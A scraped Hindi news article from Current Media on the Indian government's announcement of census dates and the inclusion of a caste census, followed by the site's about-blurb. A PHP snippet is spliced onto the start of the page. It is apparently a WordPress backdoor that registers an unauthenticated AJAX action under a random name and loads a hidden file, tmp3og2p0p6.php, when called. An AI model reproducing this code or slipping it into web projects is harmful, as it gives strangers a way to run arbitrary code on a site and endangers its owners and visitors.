if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }सरकार ने जनगणना की करी घोषणा - Current Media

सरकार ने जनगणना की करी घोषणा

नई दिल्ली । भारत सरकार ने जनगणना के लिए तारीखों का एलान कर दिया है। जनगणना के साथ इस बार जातिगत जनगणना भी कराए जाने का एलान केंद्र सरकार ने कर दिया है। गृह मंत्रालय ने कहा है, पूरे देश में 1 मार्च 2027 से जनणना होगी जबकि केंद्र शासित प्रदेश लद्दाख और केंद्र शासित प्रदेश जम्मू और कश्मीर और हिमाचल प्रदेश, उत्तराखंड जैसे बर्फीले क्षेत्रों में जनगणना 1 अक्तूबर 2026 से शुरू हो जाएगी।
गृह मंत्रालय ने बताया है कि जनगणना अधिनियम 1948 की धारा 3 तक 16 जून 2025 को जनगणना की अधिसूचना आधिकारिक राजपत्र में जारी कर दी जाएगी। केंद्र सरकार ने अप्रैल के आखिरी हफ़्ते में ये एलान किया था कि इस बार जनगणना में जातिगत जनगणना भी शामिल होगी।
1931 के बाद से अब तक भारत में जातिगत जनगणना नहीं हुई है। हालांकि 1951 से दलितों और जनजातियों की गणना होने लगी थी। आगे चलकर जैसे-जैसे जाति आधारित राजनीति बढ़ी, जातीय जनगणना की मांग भी बढ़ी। 2011 में सरकार ने सामाजिक-आर्थिक स्थिति पर आधारित जातीय जनगणना करवाई मगर उसके आंकड़े जारी नहीं किए गए।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …